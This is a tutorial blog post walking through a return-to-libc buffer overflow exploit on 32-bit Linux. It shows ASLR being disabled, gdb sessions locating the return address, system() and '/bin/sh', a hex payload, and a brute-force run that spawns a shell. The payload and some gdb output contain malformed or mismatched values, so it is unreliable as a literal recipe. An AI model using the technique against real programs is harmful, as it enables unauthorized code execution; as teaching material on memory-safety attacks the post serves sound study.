Return-to-libc Exploit

6 min readFeb 11, 2019

In the previous post, we had a look at a basic, yet widespread vulnerability — Integer Overflow. We got a feel for how dangerous such simple programming mistakes can be and how cyber-criminals WILL use it to their advantage. In this post, we’ll look at another clever exploit called Return-to-libc.

Note:

I assume that you have a basic knowledge of gdb and the structure of a process stack
Example exploits are based off a 32-bit system.

Birth of Return-to-libc

Return-to-libc is an exploit that countered Data Execution Prevention (DEP), which in turn was added as a memory protection scheme in operating systems as a counter to shellcode injection.

In general, an attacker overflows a buffer on the process stack with NOP sleds and a payload to overwrite the return address (at the end of a function) in such a way that the pointed-to address is somewhere in the NOP sled. The CPU will then slide to the payload and execute it.

A computer is just a dumb machine which will do whatever we tell it to do. In this case, the return address has been overwritten to point to malicious code but the computer does not care. It begins executing instructions present at that address — the attacker’s malicious code — and then… well, the attacker will likely have full control of the system. Usually, an attacker places shellcode that spawns the system shell.

The buffer overflow and resulting arbitrary code execution occurs on the process stack. The function of DEP is to prevent execution on the stack. Simple enough? Well, it IS simple but not sufficient to stop an attacker.

Return-to-libc exploit also begins with a buffer overflow but uses code that is already visible to the target program, like the C standard library functions in libc. Unlike a typical shellcode injection attack, the injected shellcode in a return-to-libc attack does not contain code for spawning a system shell. Essentially, this exploit looks for the memory address of system() and the string "/bin/sh" (also a part of libc). It jumps to system() (not back to the shellcode) and uses that function call to spawn a shell.

Preparation for Exploit

Finding a Vulnerable System

The program I’ve chosen to exploit is an open-source system, and obviously I cannot tell which. How did I come across the vulnerability? I fuzzed, and fuzzed, and fuzzed some more. If you don’t know how to, read my post on Fuzzing with AFL.

Disable ASLR

Address Space Layout Randomization (ASLR) is another memory protection technique which is a counter to return-to-libc type exploits. Since this post is dedicated to return-to-libc, we’ll have to disable ASLR. Of course, there are ways to get around ASLR as well — brute force for one. Another recent vulnerability that bypasses ASLR is BranchScope — magnificent!

kr@k3n@ubuntu:~/target$ cat /proc/sys/kernel/randomize_va_space
2
kr@k3n@ubuntu:~/target$ echo “0” | sudo dd of=/proc/sys/kernel/randomize_va_space
0+1 records in
0+1 records out
2 bytes copied, 0.000160017 s, 12.5 kB/s
kr@k3n@ubuntu:~/target$ cat /proc/sys/kernel/randomize_va_space
0

Compiler Flags

We will have to compile the target application with the -fno-stack-protector flag to enable our exploit. In some Linux distributions, gcc has Stack Protector turned on by default. This protection feature can detect stack buffer overflows (or stack smashing) and crash the program. Other Linux distributions have this scheme turned off by default and can be enabled by compiling with -fstack-protector. For more information on this flag, refer to this Stack Overflow Answer.

If you’re wondering about the effectiveness of this exploit when we’ve already disabled two existing memory protection schemes, you’re correct. But you should keep in mind that this exploit technique is more than a decade old. In fact, DEP was developed in response to these types of exploits!

Time to Exploit!

I’ll be using gdb as my debugger of choice. You're free to use any debugger according to your comfort level.

Return Address, wh’re art thee?

The return address is 4 bytes above the base frame pointer (%ebp). So, I'll place a breakpoint at an address where I can read the %ebp. Obviously, this address is inside the function which contains the buffer we'll overflow.

kr@k3n@ubuntu:~/target$ gdb -q target
Reading symbols from target…done.
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) b sample_file.c:174
Breakpoint 1 at 0x804c83f: file sample_file.c, line 174.
(gdb) r crash_input.bin
Starting program: /home/kr@k3n/target/target crash_input.bin
Breakpoint 1, vuln_function (self=0xbfffeaa8, some_var=34) at sample_file.c:174
174 buffer[length++] = some_other_var;
(gdb) print $ebp
$1 = (void *) 0xbfffe9f8

Notice that I’ve executed two unset env commands. The two environment variables, LINES and COLUMNS are gdb specific and do not exist in a non-gdb environment. They end up messing up the memory addresses (because they're assigned memory as well) and cause our shellcode to work only inside gdb and not outside it.

So, %ebp is at 0xbfffe9f8. The return address must be located at 0xbfffe9fc.

(gdb) x/xw 0xbfffe9fc
0xbfffe9dc: 0x0804d633

Length of NOP Sled

The NOP sled is going to stretch from the start of the buffer until the start of the return address. It must be noted here that any random character can be used instead of NOPs; you don’t need to use a NOP specifically. NOPs are especially useful when the flow is returned to them causing the CPU to slide all the way to the shellcode.

Where is our buffer?

(gdb) print &buf
$2 = (char (*)[128]) 0xbfffe968

How many NOPs do we need?

(gdb) print 0xbfffe9f8–0xbfffe968
$3 = 144

Finding the address of system()

The target program that I’ve chosen doesn’t explicitly use system(), therefore one cannot find its address using print 'system@plt'. (I'll write about PLT - Procedure Linkage Table - and GOT - Global Offsets Table - in the coming posts.) We'll have to print the address of system() at run-time.

(gdb) print system
$4 = {} 0xb7deeda0

Finding the address of “/bin/sh”

(gdb) find 0xb7deeda0, +999999999, “/bin/sh”
0xb7f0fa0b
warning: Unable to access 16000 bytes of target memory at 0xb7fbb813, halting search.
1 pattern found.

Shellcode Construction

The shellcode that I had to construct for my target is a little complicated because of certain “lucky” restrictions in the program implementation. Here’s the shell code that I had to use:

kr@k3n@ubuntu:~/target$ cat crash_input.bin
“\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x94\xa0\xed\xde\xb7\x68\xea\xff\xbf\x0b\xfa\xf0\xb7\xzz

NOPs Length Mismatch

The above shellcode contains 128 NOPs. Certain program implementation restrictions led to the placement of \x94, which in turn caused a skip of the rest of the NOPs. If these restrictions were not present, there would be 144 NOPs.

Placement of system() and “/bin/sh”

Immediately after system() is called, the stack frame is expected to contain the return address and the argument to system().

(The higher address is at the top in the below stack structure.)

“/bin/sh” | 0xb7f0fa0b |
return address | 0xbfffea68 |

The system I’m working on has little endian addressing format. So, when inserting the shellcode in memory the ordering has to be reversed. I was restricted to use this particular value as the return address. You (hopefully) don’t have to.

Restriction-related hex code used

The hex codes — \x94 , \xbf\xff\xea\x68 , and \xzz were placed because of the program implementation restrictions. They are completely unrelated to the principle of return-to-libc exploit. You don't have to worry about them; you can replace them with random hex codes.

Get that Shell!

The hard-coded value in my shellcode 0xbfffea68 changes every time the program is run. Fortunately, only the Least Significant Byte (LSB) was randomized. So, I wrote a script which runs the target program with the shellcode that checks for all values between 0xbfffea00 and 0xbfffeaff - brute force, in other words.

kr@k3n@ubuntu:~/target$ python3 addr.py
Trying: \x00
Segmentation fault (core dumped)
35584
Trying: \x01
Segmentation fault (core dumped)
35584
…
…
Segmentation fault (core dumped)
35584
Trying: \x78
$ whoami
kr@k3n
$

There’s the shell we wanted! But this is just step one. An attacker’s next step would be to get the root shell which is beyond the scope of this post. Also, notice how the hard-coded value is different in the sections before and the actual exploit.

If the target program runs with root privileges, then we make it very easy for the attacker to get root privileges. Although spawning the shell using "/bin/sh" drops privileges, using "/bin/sh -p" does not, so be very careful of the programs that run with root privileges on your system. This number is best kept minimum.

Done!

That’s it for this topic! Unfortunately, I couldn’t provide a simpler example (other than the generic ones) but this is what cybersecurity is all about! Adapting, hacking and patching!

Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!